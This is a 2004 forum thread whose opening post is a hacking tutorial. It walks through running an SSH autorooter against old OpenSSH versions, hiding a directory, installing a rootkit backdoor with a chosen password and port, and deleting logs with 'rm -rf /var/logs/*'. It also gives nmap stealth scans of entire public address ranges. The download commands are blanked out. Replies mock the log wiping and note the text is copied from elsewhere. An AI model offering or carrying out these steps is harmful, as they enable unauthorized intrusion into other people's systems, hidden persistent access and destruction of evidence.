Government Security
Network Security Resources

Jump to content


Ssh Scanning And Hacking

shell ips ssh port scan rootkit stealth fingerprinting tutorial
  • Please log in to reply
6 replies to this topic

#1 prof



  • Members
  • 5 posts

Posted 07 September 2004 - 06:20 AM

SSH Scanning and Hacking
First, we need some tools
secureCRT (https://secure.vandy...=SecureCRT_beta)
A SSH Client to connect to an SSH box.. With this
version u can SSH with a proxy

LNX r00tkit (
a rootkit, best there is i think.. Very easy to use..
Only needed in last step

X6 (
The Autorooter..

First, you gotta have a scan with vulernable ips (or just
one )
Almost always works for exploiting..

Lets say we got an IP,, and a shell..
Connect to your shell and type :
it downloads the autorooter to the shell..
When its done, Type : tar xzvf x6.tgz
Then type cd x6

When in the dir, type : ./x6 -t#
it shows u all the Exploitable SSH Versions.. Lets say we got an
exploitable SSH-1.99-OpenSSH-2.1.1 (target 123 on the list)
The Ip =
you type :
./x6 -t123

Now it says something like : ATTACH NOW..
Wait 6 Seconds then push Enter.. Normally it starts
exploiting, it says like
1. 0x0000000 . . [SEGV]
2. 0x00000c4 . . [SURVIVED]
Something like that..

Just let it go and it will exploit your box..

If it doesnt go to 1. ..., and it says FATAL: no
its not vulernable

Then, when it exploited the box, u get some thing like :
no crash been found
Rem from Remote : CHRIS CHRIS

*** YOU ARE IN ***
Boxhost blahblah

then type the following
cd /usr/man/man3/
and then :
mkdir ". hiden"
and then :
cd "..."
This is an hidden dir so the Sysop wont notice

Now we r going to download the Rootkit
type :
It will start downloading..
When done, type : tar xzvf lnx.gz
and then:
cd lnx

Then, we r going to start it..
Lets say u want password "poop" on port 25374
then u type :
./own poop 25374

It Installs the Rootkit, and Done !! Connect to the ip
with port 25374 (or the one u too
Username = root
and u gave the password urself..

now CLEANIN (for no traces):

rm -rf /var/logs/*

USE nmap



for SSH scanz

nmap -O -sS -p 20-23,80,443 '194.65.*.*' > FILE.OUTPUT

-O means guess remote OS
-sS tcp syn stealth
-p ports to scan (WE include ftp telnet and ssh and HTTP and secure http)
and finaly the nets '194.65.*.*' it will scan from

have PHUnz

ome Common Scan Types ('*' options require root privileges)
* -sS TCP SYN stealth port scan (default if privileged (root))
-sT TCP connect() port scan (default for unprivileged users)
* -sU UDP port scan
-sP ping scan (Find any reachable machines)
* -sF,-sX,-sN Stealth FIN, Xmas, or Null scan (experts only)
-sR/-I RPC/Identd scan (use with other scan types)
Some Common Options (none are required, most can be combined):
* -O Use TCP/IP fingerprinting to guess remote operating system
-p ports to scan. Example range: '1-1024,1080,6666,31337'
-F Only scans ports listed in nmap-services
-v Verbose. Its use is recommended. Use twice for greater effect.
-P0 Don't ping hosts (needed to scan and others)
* -Ddecoy_host1,decoy2[,...] Hide scan using many decoys
-T General timing policy
-n/-R Never do DNS resolution/Always resolve [default: sometimes resolve]
-oN/-oX/-oG Output normal/XML/grepable scan logs to
-iL Get targets from file; Use '-' for stdin
* -S /-e Specify source address or network interface
--interactive Go into interactive mode (then press h for help)
Example: nmap -v -sS -O '192.88-90.*.*'

Protecting your box to rehackers (IMPORTANT !!

Before scanin or haxin i would recomend to change thiz vars.

its very easy

works on all linux versions..

just make a shell ****** with vi ::

echo Protectin ur Env to a safe hax W0rk
echo LOL.dDwAx
echo 1 > /proc/sys/net/ipv4/tcp_syn******s
echo 1 > /proc/sys/net/ipv4/conf/default/hidden
echo 1 > /proc/sys/net/ipv4/conf/default/proxy_arp
echo 1 > /proc/sys/net/ipv4/conf/default/forwarding
echo 1 > /proc/sys/net/ipv4/conf/default/log_martians
echo 1 > /proc/sys/net/ipv4/conf/default/rp_filter
echo 1 > /proc/sys/net/ipv4/conf/eth0/hidden
echo 1 > /proc/sys/net/ipv4/conf/eth0/proxy_arp
echo 1 > /proc/sys/net/ipv4/conf/eth0/forwarding
echo 1 > /proc/sys/net/ipv4/conf/eth0/log_martians
echo 1 > /proc/sys/net/ipv4/conf/eth0/rp_filter
echo Done
echo now use ur nmap or ur exploits and have phunz

#2 Tyrano


    Staff Sergeant

  • Members
  • 296 posts

Posted 07 September 2004 - 08:14 AM

i think someone might notice if all of the logs are gone. :P

#3 M4Z3R


    Private First Class

  • Members
  • 96 posts

Posted 07 September 2004 - 09:07 AM

Thx Teacher for this little tut, I'll maybe have a try on my local distro ;)

#4 Stephen79


    Staff Sergeant

  • Sergeant Major
  • 349 posts

Posted 07 September 2004 - 09:23 AM

Also saw this exact same thing word for word here:

http://members.lycos.....H Hacking.txt

Not all the links are active there either :P

#5 Stephen79


    Staff Sergeant

  • Sergeant Major
  • 349 posts

Posted 07 September 2004 - 09:27 AM

oh, and if you root it (step back) there are many more.

http://members.lycos...xp/For A Board/

#6 Blight



  • Members
  • 4 posts

Posted 07 September 2004 - 10:55 AM

Deleting all /var/log would be a bit stupid, i think :) Maybe only if you hope that the admin is blind :)

Do u still find such old sshd versions ?

#7 sajid89



  • Members
  • 9 posts

Posted 02 May 2012 - 02:53 AM

The only time arch loses over another distro is in terms of complex configurations. The only times I don't use arch is when I need an extremely complex system, then I use BSDs.. but for complex linux systems, I go gentoo or Slackware.

Also tagged with one or more of these keywords: shell, ips, ssh, port scan, rootkit, stealth, fingerprinting, tutorial